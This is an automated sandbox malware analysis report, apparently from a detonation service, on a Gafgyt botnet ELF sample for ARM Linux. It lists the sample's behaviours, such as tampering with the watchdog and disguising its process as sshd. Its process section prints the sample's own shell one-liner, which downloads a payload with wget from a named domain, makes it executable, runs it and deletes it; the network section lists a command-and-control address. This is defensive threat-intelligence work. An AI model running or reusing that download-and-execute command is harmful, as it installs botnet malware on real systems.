Malware Analysis Report

2025-08-05 23:59

Sample ID 240402-bmh9dscd4w
Target 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
SHA256 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95
Tags
gafgyt
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95

Threat Level: Known bad

The file 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf was found to be: Known bad.

Malicious Activity Summary

gafgyt

Detected Gafgyt variant

Gafgyt family

Modifies Watchdog functionality

Changes its process name

Executes dropped EXE

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 01:15

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt family

gafgyt

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 01:15

Reported

2024-04-02 01:18

Platform

debian9-armhf-20240226-en

Max time kernel

148s

Max time network

141s

Command Line

[/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself sshd /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/..... /tmp/..... N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog N/A N/A
File opened for modification /dev/misc/watchdog N/A N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/..... /usr/bin/wget N/A

Processes

/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf

[/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf]

/bin/sh

[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]

/usr/bin/wget

[wget -q http://gay.energy/.../vivid -O .....]

/bin/chmod

[chmod 777 .....]

/tmp/.....

[./.....]

/bin/sh

[/bin/sh ./.....]

/bin/rm

[rm -rf .....]

Network

Country Destination Domain Proto
MD 85.239.33.129:666 tcp
US 1.1.1.1:53 gay.energy udp
US 1.1.1.1:53 gay.energy udp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp

Files

N/A